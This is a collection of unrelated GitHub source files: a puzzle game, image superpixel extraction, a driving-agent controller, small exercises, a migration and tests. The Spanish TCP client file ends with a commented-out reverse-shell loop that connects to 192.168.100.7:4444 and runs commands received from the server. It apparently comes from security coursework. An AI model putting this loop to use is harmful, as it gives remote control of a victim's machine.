self.upperStones[i]\n\n for i in range(0, 6):\n self.upperBones[i] = new_bones[i]\n self.upperStones[i] = new_stones[i]\n\n self.lowerBones[0] = self.upperBones[5]\n self.lowerStones[0] = self.upperStones[4]\n self.lowerStones[1] = self.upperStones[5]\n else:\n if direction == Direction.RIGHT:\n for i in range(0, 6):\n if self.lowerStones[i] < 6:\n self.stones[self.lowerStones[i]].inc_orient()\n\n idx = i + 5\n if idx > 5:\n idx -= 6\n new_bones[idx] = self.lowerBones[i]\n new_stones[idx] = self.lowerStones[i]\n else:\n for i in range(0, 6):\n if self.lowerStones[i] < 6:\n self.stones[self.lowerStones[i]].dec_orient()\n\n idx = i - 5\n if idx < 0:\n idx += 6\n\n new_bones[idx] = self.lowerBones[i]\n new_stones[idx] = self.lowerStones[i]\n\n for i in range(0, 6):\n self.lowerBones[i] = new_bones[i]\n self.lowerStones[i] = new_stones[i]\n\n self.upperBones[5] = self.lowerBones[0]\n self.upperStones[4] = self.lowerStones[0]\n self.upperStones[5] = self.lowerStones[1]\n\n if self.gameActive:\n s0 = self.get_color_string()\n s1 = Blocks.get_color_string()\n if s0 == s1:\n self.gameActive = False\n self.gameSuccess = True\n\n def rotate_disc(self, direction: Direction, disc: Disc, deg):\n if disc == Disc.UPPER:\n if direction == Direction.RIGHT:\n deg = -deg\n self.rotate(self.upperBones, self.upperStones, self.upperCenterX, self.upperCenterY, deg)\n else:\n if direction == Direction.RIGHT:\n deg = -deg\n self.rotate(self.lowerBones, self.lowerStones, self.lowerCenterX, self.lowerCenterY, deg)\n\n def rotate(self, bones, stones, cx, cy, deg):\n for i in range(0, 6):\n self.bones[bones[i]].rotate(deg, cx, cy)\n self.stones[stones[i]].rotate(deg, cx, cy)\n\n def get_color_string(self):\n sb = \"\"\n for i in range(0, 5):\n sb = sb + self.stones[self.upperStones[i]].get_color_string()\n sb = sb + self.bones[self.upperBones[i + 1]].get_color_string()\n\n sb = sb + self.stones[self.upperStones[5]].get_color_string()\n sb = sb + self.bones[self.upperBones[0]].get_color_string()\n\n sb = sb + self.bones[self.lowerBones[1]].get_color_string()\n for i in range(2, 6):\n sb = sb + self.stones[self.lowerStones[i]].get_color_string()\n sb = sb + self.bones[self.lowerBones[i]].get_color_string()\n\n return sb\n\n def get_level(self):\n return const.LEVELS[self.level]\n\n def level_up(self):\n if self.level == 10:\n return\n\n self.level = self.level + 1\n self.gameActive = False\n self.gameSuccess = False\n self.init_board()\n\n def level_down(self):\n if self.level == 0:\n return\n\n self.level = 
self.level - 1\n self.gameActive = False\n self.gameSuccess = False\n self.init_board()\n\n def new_game(self):\n self.init_board()\n\n self.numTurns = 20\n self.bShowTurns = False\n self.gameActive = False\n self.gameSuccess = False\n self.moves = []\n self.gameMoves = 0\n self.startTime = time.time()\n\n for i in range(0, self.numTurns):\n direction = Direction.RIGHT\n disc = Disc.UPPER\n if i % 2 == 0:\n disc = Disc.LOWER\n\n anz = random.randint(1, 6)\n if anz > 3:\n direction = Direction.LEFT\n anz = anz - 3\n\n self.gameMoves += anz\n\n for j in range(0, anz):\n self.turn_disc(direction, disc)\n self.rotate_disc(direction, disc, 60.0)\n if self.bShowTurns:\n pass\n\n s = self.get_color_string()\n s1 = Blocks.get_color_string()\n if s == s1:\n self.turn_disc(Direction.RIGHT, Disc.LOWER)\n self.rotate_disc(Direction.RIGHT, Disc.LOWER, 60.0)\n self.turn_disc(Direction.RIGHT, Disc.LOWER)\n self.rotate_disc(Direction.RIGHT, Disc.LOWER, 60.0)\n self.turn_disc(Direction.RIGHT, Disc.LOWER)\n self.rotate_disc(Direction.RIGHT, Disc.LOWER, 60.0)\n\n self.turn_disc(Direction.LEFT, Disc.UPPER)\n self.rotate_disc(Direction.LEFT, Disc.UPPER, 60.0)\n self.turn_disc(Direction.LEFT, Disc.UPPER)\n self.rotate_disc(Direction.LEFT, Disc.UPPER, 60.0)\n self.turn_disc(Direction.LEFT, Disc.UPPER)\n self.rotate_disc(Direction.LEFT, Disc.UPPER, 60.0)\n\n self.gameMoves += 6\n\n self.gameActive = True\n\n def color_blocks(self):\n for i in range(0, 64):\n Blocks.blocks[i].col = random.randrange(0, 7)\n","repo_name":"adiuvaris/EnigmaGame","sub_path":"src/EnigmaGame/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20732643027","text":"# from skimage.filters import sobel\nfrom skimage.segmentation import slic, mark_boundaries\nimport cv2 #much faster image loading than skimage\nimport numpy as np\nimport glob\n# import sys\nimport pandas as pd\nfrom tqdm import tqdm\nimport subprocess\nfrom argparse import ArgumentParser\n\n\n# Threshold for deciding if the label of a superpixel should be 0 or 1\n# Currently if 2% or more of the superpixel has a mask, it is labelled true\nTHRESHOLD = 0.02\n\n# Pretty optimal values. Found using trial-and-error\nSEGMENTS = 200\nCOMPACTNESS = 35\n\ndef crop_img(img):\n im = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n mask = im>0\n return img[np.ix_(mask.any(1),mask.any(0))]\n\ndef save_patches(sp_list,labels,counter,csv=[],p_sav=''):\n for j in range(len(sp_list)):\n cv2.imwrite(p_sav+'train/Patch_'+str(counter)+'.png',sp_list[j])\n csv.append([p_sav+'train/Patch_'+str(counter),labels[counter]])\n counter+=1\n csv_df = pd.DataFrame(np.array(csv))\n csv_df.to_csv('Labels.csv')\n return counter,csv\n\ndef main(): \n parser = ArgumentParser(\n description=\"Script for generating superpixel training masks, from actual masks.\"\n \" Also outputs cropped superpixels extracted from images and their labels.\")\n parser.add_argument('-i','--image_path',help='Path to directory with images', required=True)\n parser.add_argument('-m','--mask_path',help='Path to directory with masks', required=True)\n parser.add_argument('-b','--band_path',help='Path to directory to save new bands', required=True)\n parser.add_argument('-p','--patch_path',help='Path to directory to save patches', required=True)\n parser.add_argument('-c','--counter',help='Initial value of counter. 
Use if save path already has patches saved', required=False, default=0)\n parser.add_argument('-s','--shutdown',help='Shutdown VM after script execution completes', required=False, default=None)\n args = parser.parse_args()\n \n im = args.image_path\n msk = args.mask_path\n b_sav = args.band_path\n p_sav = args.patch_path\n\n im_addr = sorted(glob.glob(im+\"/*\"))\n msk_addr = sorted(glob.glob(msk+\"/*\"))\n\n sp_list = []\n labels = []\n csv = []\n counter = args.counter\n if(counter>0):\n df = pd.read_csv('Labels.csv')\n csv = list(df.itertuples(index=False))\n \n for i in tqdm(range(len(im_addr))):\n im = cv2.imread(im_addr[i])\n\n mask = cv2.imread(msk_addr[i])\n mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n\n # Returns 2D array with same size as image.\n # Each pixel has an integer value denoting which\n # superpixel it belongs to.\n seg = slic(im, n_segments=SEGMENTS, compactness=COMPACTNESS)\n\n new_band = np.zeros_like(im[:,:,0])\n for sp_index in range(np.max(seg)+1):\n # Get the rows and column of the pixels in current spixel\n rows,cols = np.where(seg==sp_index) \n # Number of pixels in current spixel\n num_pixels = rows.shape[0] \n super_pixel = np.zeros_like(im)\n mask_segment = np.zeros_like(im[:,:,0])\n \n # Generate cropped spixel\n super_pixel[rows,cols,:] += im[rows,cols,:] \n super_pixel = crop_img(super_pixel)\n super_pixel = cv2.resize(super_pixel,(128,128),cv2.INTER_AREA)\n\n # Extract portion of mask\n mask_segment[rows,cols] += mask[rows,cols]\n\n # Calculate label\n num_true = np.sum(mask_segment)/255\n fraction_true = float(num_true)/num_pixels\n label = 1 if fraction_true>THRESHOLD else 0\n \n sp_list.append(super_pixel)\n labels.append(label)\n\n # Calculate the new band\n if(label==1):\n new_band[rows,cols] += 255\n\n # Save the new band\n cv2.imwrite(b_sav+'/Band4_'+(im_addr[i].split('/')[-1])[:-5]+'.png',new_band)\n\n # Save patches every 50 images processed\n # Delete patches from memory after saving\n if(i%50 == 49):\n counter,csv = save_patches(sp_list,labels,counter,csv,p_sav) \n sp_list = []\n\n save_patches(sp_list,labels,counter,csv,p_sav)\n if args.shutdown:\n subprocess.call(['shutdown', '-h', 'now'])\n \nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","repo_name":"ZQH-sail/Superpixel_Extraction","sub_path":"SuperpixelTrain.py","file_name":"SuperpixelTrain.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12112936232","text":"import random\nfrom dataclasses import dataclass\nfrom typing import Sequence\nimport numpy as np\nfrom typing import Optional\n\nfrom commonroad.scenario.lanelet import LaneletNetwork\nfrom dg_commons import PlayerName\nfrom dg_commons.sim.goals import PlanningGoal\nfrom dg_commons.sim import SimObservations, InitSimObservations\nfrom dg_commons.sim.agents import Agent\nfrom dg_commons.sim.models.obstacles import StaticObstacle\nfrom dg_commons.sim.models.vehicle import VehicleCommands\nfrom dg_commons.sim.models.vehicle_structures import VehicleGeometry\nfrom dg_commons.sim.models.vehicle_utils import VehicleParameters\n# controller\nfrom dg_commons.controllers.speed import SpeedBehavior, SpeedController\nfrom dg_commons.controllers.steer import SteerController\nfrom dg_commons.controllers.pid import PIDParam\n# import rrt\nfrom pdm4ar.exercises.ex08.rrt import RRT\nfrom geometry import SE2value, angle_from_SE2, translation_angle_from_SE2\nfrom dg_commons.geo import SE2_apply_T2\nfrom geometry import SE2_from_xytheta, 
SE2value, translation_from_SE2\n#from dg_commons.maps import DgLanelet\n#from dg_commons.controllers.pure_pursuit import PurePursuit, PurePursuitParam\n\n\nclass PurePursuitController:\n \"\"\" PurePursuit Controller\n Returns: delta_ref \"\"\"\n def __init__(self, waypoints, lookahead, goal):\n self.waypoints = waypoints\n self.current_waypoint_idx = 0\n self.lookahead = lookahead\n self.index = None\n self.goal = goal\n self.lookead_minmax = (3,8)\n \n \n def find_goal_point(self, pos):\n lookahead = self.lookahead\n #print(\"lookahead\", lookahead)\n min_dist = float('inf')\n closest_waypoint_idx = None\n for i, waypoint in enumerate(self.waypoints):\n dist = np.linalg.norm(np.array(waypoint) - np.array(pos))\n if dist < min_dist:\n min_dist = dist\n closest_waypoint_idx = i\n \n goal_point = self.goal\n for i in range(closest_waypoint_idx, len(self.waypoints)):\n waypoint = self.waypoints[i]\n self.index = i\n dist = np.linalg.norm(np.array(waypoint) - np.array(pos))\n if dist > lookahead:\n goal_point = waypoint\n break\n \n return goal_point\n \n \n def get_steering_angle(self, pos, pose, psi_ref):\n \"\"\"\n :return: float the desired wheel angle\n \"\"\"\n goal_point = self.find_goal_point(pos=pos)\n theta = angle_from_SE2(pose)\n rear_axle = SE2_apply_T2(pose, np.array([-1.2, 0]))\n # transform goal point to SE2 value\n if goal_point is not None:\n goal_point = SE2_from_xytheta([goal_point[0], goal_point[1], psi_ref[self.index-1]])\n #print(\"psi_ref of goal point\", psi_ref[self.index-1])\n angle = psi_ref[self.index-1]\n p_goal, theta_goal = translation_angle_from_SE2(goal_point)\n alpha = np.arctan2(p_goal[1] - rear_axle[1], p_goal[0] - rear_axle[0]) - theta\n radius = self.lookahead / (2 * np.sin(alpha))\n delta_ref = np.arctan(3.5 / radius)\n delta_ref = np.clip(delta_ref, -1, 1)\n return delta_ref, angle\n\nclass Pdm4arAgent(Agent):\n \"\"\"This is the PDM4AR agent.\n Do *NOT* modify the naming of the existing methods and the input/output types.\n Feel free to add additional methods, objects and functions that help you to solve the task\"\"\"\n\n def __init__(self,\n sg: VehicleGeometry,\n sp: VehicleParameters\n ):\n self.sg = sg\n self.sp = sp\n self.name: PlayerName = None\n self.goal: PlanningGoal = None\n self.lanelet_network: LaneletNetwork = None\n self.static_obstacles: Sequence[StaticObstacle] = None\n # controller\n self.speed_controller = SpeedController.from_vehicle_params(model_param=self.sp) # initialize PID controller for speed\n self.speed_behavior: Optional[SpeedBehavior] = None # reference speed\n self.steer_controller = SteerController.from_vehicle_params(vehicle_param=self.sp)\n self.PID_params = PIDParam\n self.PID_params.kP = 1.3 #1.4?\n self.PID_params.kI = 0\n self.PID_params.kD = 1.7\n self.PID_params.setpoint_minmax = (-1.0,1.0)\n self.PID_params.output_minmax = (-0.5,0.5)\n self.steer_controller.params = self.PID_params\n self.lookahead = 3.2\n self.slow_down = 0.8\n #self.pure_pursuit: PurePursuit = PurePursuit.from_model_geometry(self.sg)\n #self.pure_pursuit_params = PurePursuitParam\n #self.pure_pursuit_params.look_ahead_minmax = (3,4)\n #self.pure_pursuit.param = self.pure_pursuit_params\n\n \n def on_episode_init(self, init_obs: InitSimObservations):\n \"\"\"This method is called by the simulator at the beginning of each episode.\"\"\"\n self.name = init_obs.my_name\n self.goal = init_obs.goal\n self.lanelet_network = init_obs.dg_scenario.lanelet_network\n self.static_obstacles = list(init_obs.dg_scenario.static_obstacles.values())\n # 
controller\n self.speed_behavior: SpeedBehavior = SpeedBehavior()\n self.speed_behavior.my_name = self.name\n self.pure_pursuit = None\n\n # RRT\n self.graph = None\n self.path = None\n self.success = False\n self.smoothed_path = None\n self.delta_ref = 0\n self.psi_ref = None\n\n # Multi-player\n\n\n \n def get_commands(self, sim_obs: SimObservations) -> VehicleCommands:\n \"\"\" This method is called by the simulator at each time step.\n For instance, this is how you can get your current state from the observations:\n my_current_state: VehicleState = sim_obs.players[self.name].state\n\n :param sim_obs:\n :return:\n \"\"\"\n \n \"\"\" Vehicle params\"\"\"\n # Position\n agent = sim_obs.players[self.name]\n x = agent.state.x\n y = agent.state.y\n pos = (x,y)\n polygon = self.goal.goal\n end_pos_s = polygon.centroid # shapely point\n end_pos = (end_pos_s.x, end_pos_s.y) # convert to tuple\n # Orientation\n psi = agent.state.psi\n # Time\n t = float(sim_obs.time)\n # Static obstacles\n obstacles = self.static_obstacles\n \n \"\"\" Trajectory \"\"\"\n # RRT graph\n RRT_ = RRT(startpos=pos, endpos=end_pos, obstacles=obstacles, lanelet_network = self.lanelet_network, buffer=2.5)\n while self.success is False:\n #print(\"buffersize\", RRT_.buffer)\n self.graph, self.success = RRT_.generate_RRT()\n if self.success is False:\n RRT_.buffer -= 0.3\n\n #print(\"self.success\", self.success)\n \n # Path from start to goal as list\n if self.success:\n self.path = RRT_.dijkstra(self.graph)\n self.smoothed_path = RRT_.smooth_path(self.path)\n #RRT_.plot(self.graph, path = self.smoothed_path)\n #else:\n #print(\"no path to goal found by RRT\") \n \n \"\"\" Multi-player \"\"\"\n #print(sim_obs.players[self.name].occupancy)\n\n\n \"\"\" Steer controller \"\"\"\n self._my_obs = sim_obs.players[self.name].state\n my_pose: SE2value = SE2_from_xytheta([self._my_obs.x, self._my_obs.y, self._my_obs.psi])\n \n if self.psi_ref == None:\n self.psi_ref = []\n for i in range(1,len(self.smoothed_path)):\n delta_x = self.smoothed_path[i][0] - self.smoothed_path[i-1][0]\n delta_y = self.smoothed_path[i][1] - self.smoothed_path[i-1][1]\n self.psi_ref.append(np.arctan2(delta_y, delta_x)) \n \n if self.pure_pursuit == None:\n self.pure_pursuit = PurePursuitController(self.smoothed_path, self.lookahead, end_pos)\n self.delta_ref, angle = self.pure_pursuit.get_steering_angle(pos, my_pose, self.psi_ref)\n\n # track delta_ref with PID controller\n self.steer_controller.update_measurement(measurement=self._my_obs.delta)\n self.steer_controller.update_reference(self.delta_ref)\n ddelta = self.steer_controller.get_control(t) \n\n \n \"\"\" Speed controller \"\"\"\n self.speed_behavior.update_observations(sim_obs.players)\n self.speed_controller.update_measurement(measurement=agent.state.vx)\n\n\n speed_ref, emergency = self.speed_behavior.get_speed_ref(t)\n if emergency:\n # Once the emergency kicks in the speed ref will always be 0\n self._emergency = True\n #print(\"emergency\")\n speed_ref = 0.1\n\n #print(\"cruise control\", self.speed_behavior.cruise_control(my_pose)) # relative pose = pose?\n if agent.state.vx > 8.5:\n speed_ref = 8.5\n # break before curves\n if abs(angle-psi) > 0.28:\n #print(\"break\")\n speed_ref = 4.0\n\n self.speed_controller.update_reference(reference=speed_ref)\n acc = self.speed_controller.get_control(t) * self.slow_down\n\n return VehicleCommands(acc=acc, 
ddelta=ddelta)\n","repo_name":"mr-d-self-driving/Path-Planning-and-Decision-Making-ETH-2022","sub_path":"ex08/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":9233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35734496039","text":"def is_palindrome(w):\n m = len(w)//2\n for i in range(0,m):\n if w[i] != w[i+m]:\n return False\n return True\n\nw = input()\nn = len(w)\nc = 0\nfor i in range(n):\n for j in range(i,n):\n if is_palindrome(w[i:j+1]):\n c += 1\nif c%2 == 1:\n print(\"Odd.\")\nelse:\n print(\"Or not.\")\n","repo_name":"lozaeric/icpc_undav","sub_path":"RPC/2018/12/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8167217332","text":"num = 2.5432\r\n\r\n\r\ndef findFraction01(num, error=0.000000000000001):\r\n LF = (0, 1)\r\n HF = (1, 1)\r\n iter = 0\r\n\r\n if num == 1:\r\n return HF\r\n if num == 0:\r\n return LF\r\n\r\n while True:\r\n MF = (LF[0]+HF[0], LF[1]+HF[1])\r\n\r\n M = MF[0]/MF[1]\r\n L = LF[0]/LF[1]\r\n H = HF[0]/HF[1]\r\n\r\n iter += 1\r\n if(M < num-error):\r\n LF = MF\r\n continue\r\n if(M > num+error):\r\n HF = MF\r\n continue\r\n\r\n print(\"tollerance:\", abs(num-M))\r\n print(\"iterations:\", iter)\r\n return MF\r\n\r\n\r\ndef findFraction(num):\r\n integer = int(num)\r\n fractional = num-integer\r\n\r\n frac = findFraction01(fractional)\r\n\r\n total = (frac[0]+integer*frac[1], frac[1])\r\n return total\r\n\r\n\r\nfrac = findFraction(num)\r\n\r\nprint(frac)\r\n","repo_name":"ManuelLerchner/Random-Coding-Projects","sub_path":"Python/fractionsTest/fractionsTest.py","file_name":"fractionsTest.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26593453624","text":"import socket\r\nimport argparse\r\nfrom cryptography.fernet import Fernet\r\n\r\ndescripcion = \"\"\" Instrucciones de uso:\r\nclient.py -msj (mensaje que desea enviar).\"\"\"\r\n\r\nparser = argparse.ArgumentParser(description='Escaneo de puertos',\r\n epilog=descripcion)\r\n\r\nparser.add_argument(\"-msj\", metavar='MSJ', dest=\"msj\", \r\n help=\"mensaje que desea enviar\", required=True)\r\nparams = parser.parse_args()\r\n\r\n# Cifrado\r\nclave = Fernet.generate_key()\r\ncipher_suite = Fernet(clave)\r\n\r\n# Guardar clave\r\nfile = open('clave.key', 'ab') # b es para guardar en bytes\r\nfile.write(clave)\r\nfile.close()\r\n\r\n# Tomar argumento y convertirlo a bytes.\r\nmensaje = params.msj\r\nmensaje_bytes = mensaje.encode()\r\n\r\n# Ciframos el mensaje.\r\n# Ciframos el mensaje que convertirmos en bytes.\r\nmsj_cifrado = cipher_suite.encrypt(mensaje_bytes)\r\nprint(\"Mensaje a enviar: \", msj_cifrado)\r\n\r\n# Conectarse con el servidor TCP:\r\nTCP_IP = '127.0.0.1'\r\nTCP_PORT = 5005\r\nBUFFER_SIZE = 2048\r\n\r\n# Establecer la conexión:\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((TCP_IP, TCP_PORT))\r\ns.send(msj_cifrado) # Se manda el mensaje cifrado.\r\nrespuesta = s.recv(BUFFER_SIZE).decode()\r\ns.close()\r\n\r\nprint(\"Respuesta recibida: \", respuesta)\r\n\r\n\r\n'''\r\nHOST = \"192.168.100.7\"\r\nPORT = 4444\r\nSIZE = 1024\r\n\r\n# create the socket object\r\ns = socket.socket()\r\n# connect to the server\r\ns.connect((HOST, PORT))\r\n\r\n# receive the greeting message\r\nmessage = s.recv(SIZE).decode()\r\nprint(\"Server:\", 
message)\r\n\r\nwhile True:\r\n # receive the command from the server\r\n command = s.recv(SIZE).decode()\r\n if command.lower() == \"exit\":\r\n # if the command is exit, just break out of the loop\r\n break\r\n # execute the command and retrieve the results\r\n output = subprocess.getoutput(command)\r\n # send the results back to the server\r\n s.send(output.encode())\r\n# close client connection\r\ns.close()\r\n'''","repo_name":"MRX-official/PC","sub_path":"E9/clienteTCP.py","file_name":"clienteTCP.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38778666822","text":"\"\"\"User statistics tracking\n\nRevision ID: 3a87adc2088b\nRevises: 7de7ec98049b\nCreate Date: 2020-04-13 22:11:20.064789\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"3a87adc2088b\"\ndown_revision = \"7de7ec98049b\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"user_statistic\",\n sa.Column(\"date\", sa.Date(), nullable=False),\n sa.Column(\"callback_calls\", sa.Integer(), nullable=False),\n sa.Column(\"poll_callback_calls\", sa.Integer(), nullable=False),\n sa.Column(\"created_polls\", sa.Integer(), nullable=False),\n sa.Column(\"inline_shares\", sa.Integer(), nullable=False),\n sa.Column(\"user_id\", sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(\n [\"user_id\"], [\"user.id\"], name=\"user\", ondelete=\"cascade\"\n ),\n sa.PrimaryKeyConstraint(\"date\", \"user_id\"),\n )\n op.create_index(\n op.f(\"ix_user_statistic_user_id\"), \"user_statistic\", [\"user_id\"], unique=False\n )\n\n op.alter_column(\n \"update\",\n \"count\",\n existing_type=sa.INTEGER(),\n server_default=None,\n existing_nullable=False,\n )\n op.add_column(\n \"user\",\n sa.Column(\"banned\", sa.Boolean(), server_default=\"FALSE\", nullable=False),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column(\"user\", \"banned\")\n op.alter_column(\n \"update\",\n \"count\",\n existing_type=sa.INTEGER(),\n server_default=sa.text(\"0\"),\n existing_nullable=False,\n )\n op.drop_index(op.f(\"ix_user_statistic_user_id\"), table_name=\"user_statistic\")\n op.drop_table(\"user_statistic\")\n # ### end Alembic commands ###\n","repo_name":"Nukesor/ultimate-poll-bot","sub_path":"migrations/versions/2020_04_13_3a87adc2088b_user_statistics_tracking.py","file_name":"2020_04_13_3a87adc2088b_user_statistics_tracking.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"3"} +{"seq_id":"21316337982","text":"from .utils import get_filters, get_values, get_relations, set_values, set_relations\n\n\ndef default_resolve(schema, model, data, **kwargs):\n filters = get_filters(schema, data)\n return model.objects.filter(**filters)\n\n\ndef default_execute(schema, data, raw_data, **kwargs):\n values = get_values(schema, raw_data)\n relations = get_relations(schema, raw_data)\n\n for model in data:\n set_values(model, values)\n set_relations(model, relations)\n model.save()\n return data\n","repo_name":"LonguCodes/DGF","sub_path":"DGF/resolvers/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18251010511","text":"import os\nimport shutil\nimport tempfile\nimport unittest\n\nimport pytest\nimport yaml\n\nfrom tbc.tbclib.config_parser import *\n\n\n# file fixture\n# https://docs.pytest.org/en/6.2.x/tmpdir.html\n# https://docs.pytest.org/en/6.2.x/tmpdir.html#the-tmpdir-factory-fixture\n# https://rinatz.github.io/python-book/ch08-02-pytest/\n# https://www.m3tech.blog/entry/pytest-summary\n# -------------------------------\n# Arrange-Act-Assert Style\n# http://wiki.c2.com/?ArrangeActAssert\n\n\ncfg_name = \".tbcconfig.yml\"\n\n# =============================\n# CfgParser\n# ----------\n# See: yapf/yapftests/file_resources_test.py\n# https://github.com/google/yapf/blob/main/yapftests/file_resources_test.py\n# =============================\n\n_correct_cfg_obj = {\n \"version\": \"1\",\n \"twitter\": {\n \"consumer_key\": \"CONSUMER_KEY\",\n \"consumer_secret\": \"CONSUMER_SECRET\",\n \"access_token\": \"ACCESS_TOKEN\",\n \"access_secret\": \"ACCESS_SECRET\"\n },\n \"source\": {\n \"type\": \"local\",\n \"local_path\": \"src/data/tweets-tbl.csv\",\n \"gcs_path\": \"path/to/cloud/storage/table.csv\",\n \"gspread_path\": \"path/to/spreadsheet/table\",\n }\n}\n\n_no_twtoken_cfg_obj = {\n \"version\": \"1\",\n \"twitter\": {\n \"consumer_key\": \"\",\n \"consumer_secret\": \"\",\n \"access_token\": \"\",\n \"access_secret\": \"\"\n },\n \"source\": {\n \"type\": \"local\",\n \"local_path\": \"src/data/tweets-tbl.csv\",\n \"gcs_path\": \"path/to/cloud/storage/table.csv\",\n \"gspread_path\": \"path/to/spreadsheet/table\",\n }\n}\n\n@pytest.fixture\ndef cfg_file_no_twtoken(tmpdir):\n cfg_tmpfile = tmpdir.join(cfg_name)\n with cfg_tmpfile.open('w') as f:\n cfg_str = yaml.dump(_no_twtoken_cfg_obj)\n f.write(cfg_str)\n yield str(cfg_tmpfile)\n cfg_tmpfile.remove()\n\n@pytest.fixture\ndef cfg_file_correct(tmpdir):\n cfg_tmpfile = tmpdir.join(cfg_name)\n with cfg_tmpfile.open('w') as f:\n cfg_str = yaml.dump(_correct_cfg_obj)\n f.write(cfg_str)\n yield str(cfg_tmpfile)\n cfg_tmpfile.remove()\n\n\ndef test_correct_cfg(cfg_file_correct):\n # Act\n cfg: TbcConfig = 
CfgParser.load(cfg_file_correct)\n\n # Assert\n assert cfg.ver == _correct_cfg_obj[\"version\"]\n assert cfg.tw_consumer_key == _correct_cfg_obj[\"twitter\"][\"consumer_key\"]\n assert cfg.tw_consumer_secret == _correct_cfg_obj[\"twitter\"][\"consumer_secret\"]\n assert cfg.tw_access_token == _correct_cfg_obj[\"twitter\"][\"access_token\"]\n assert cfg.tw_access_secret == _correct_cfg_obj[\"twitter\"][\"access_secret\"]\n assert cfg.src_type == 0 # SrcType.local.value\n assert cfg.src_lo_path == _correct_cfg_obj[\"source\"][\"local_path\"]\n assert cfg.src_gcs_path == _correct_cfg_obj[\"source\"][\"gcs_path\"]\n assert cfg.src_gspr_path == _correct_cfg_obj[\"source\"][\"gspread_path\"]\n assert cfg.twitter_tokens_exist() is True\n\n\ndef test_no_twtoken_cfg(cfg_file_no_twtoken):\n # Act\n cfg: TbcConfig = CfgParser.load(cfg_file_no_twtoken)\n\n # Assert\n assert cfg.twitter_tokens_exist() is False\n\n\n# =============================\n# TbcConfig\n# =============================\ndef test_tbccfg_empty():\n # Arrange / Act\n cfg = TbcConfig()\n\n # Assert\n assert cfg.twitter_tokens_exist() is False\n\ndef test_tbccfg_partial_empty():\n # Arrange / Act\n cfg = TbcConfig()\n cfg.tw_consumer_key = \"consumer_key\"\n\n # Assert\n assert cfg.twitter_tokens_exist() is False\n\ndef test_tbccfg_fulfilled():\n # Arrange\n cfg = TbcConfig()\n\n # Act\n cfg.tw_consumer_key = \"consumer_key\"\n cfg.tw_consumer_secret = \"consumer_secret\"\n cfg.tw_access_token = \"access_token\"\n cfg.tw_access_secret = \"access_secret\"\n\n # Assert\n assert cfg.twitter_tokens_exist() is True\n\n","repo_name":"sota0121/twitter-bot-cli","sub_path":"tests/test_config_parser.py","file_name":"test_config_parser.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"22217590364","text":"import MySQLdb\nimport sys\n\nfrom credentials import DATABASE_NAME, DATABASE_USER, DATABASE_PASSWORD, DATABASE_HOST\n\n\ndef get_score(score_list, value):\n if not value:\n return 0\n value = float(value)\n for x in score_list:\n if value > x[1]:\n return x[0]\n return 0\n\n\nENERGY_SCORES = [[10, 3350], [9, 3015], [8, 2680], [7, 2345], [6, 2010], [5, 1675], [4, 1340], [3, 1005], [2, 670], [1, 335]]\nSUGAR_SCORES = [[10, 45], [9, 40], [8, 36], [7, 31], [6, 27], [5, 22.5], [4, 18], [3, 13.5], [2, 9], [1, 4.5]]\nSATURATED_FAT_SCORE = [[10, 10], [9, 9], [8, 8], [7, 7], [6, 6], [5, 5], [4, 4], [3, 3], [2, 2], [1, 1]]\nSODIUM_SCORES = [[10, 900], [9, 810], [8, 720], [7, 630], [6, 540], [5, 450], [4, 360], [3, 270], [2, 180], [1, 90]]\nVEGETABLES_SCORE = [[-5, 0.8], [-2, 0.6], [-1, 0.4]]\nFIBRE_SCORES = [[-5, 4.7], [-4, 3.7], [-3, 2.8], [-2, 1.9], [-1, 0.9]]\nPROTEIN_SCORES = [[-5, 8.0], [-4, 6.4], [-3, 4.8], [-2, 3.2], [-1, 1.6]]\n\nconn = MySQLdb.connect(db=DATABASE_NAME, user=DATABASE_USER, passwd=DATABASE_PASSWORD, host=DATABASE_HOST, charset='utf8', use_unicode=True)\nif conn is None:\n sys.exit('Database connection could not be established!')\ncursor = conn.cursor(MySQLdb.cursors.DictCursor)\n\ncursor.execute(\"SELECT * FROM recipes WHERE nutri_score IS NULL\")\nrecipes = cursor.fetchall()\nfor r in recipes:\n a = get_score(ENERGY_SCORES, r['energy'])\n b = get_score(SUGAR_SCORES, r['sugar'])\n c = get_score(SATURATED_FAT_SCORE, r['saturated_fat'])\n d = get_score(SODIUM_SCORES, r['sodium'])\n e = get_score(VEGETABLES_SCORE, r['vegetables_fruits'])\n f = get_score(FIBRE_SCORES, r['fibre'])\n g = get_score(PROTEIN_SCORES, r['protein'])\n\n 
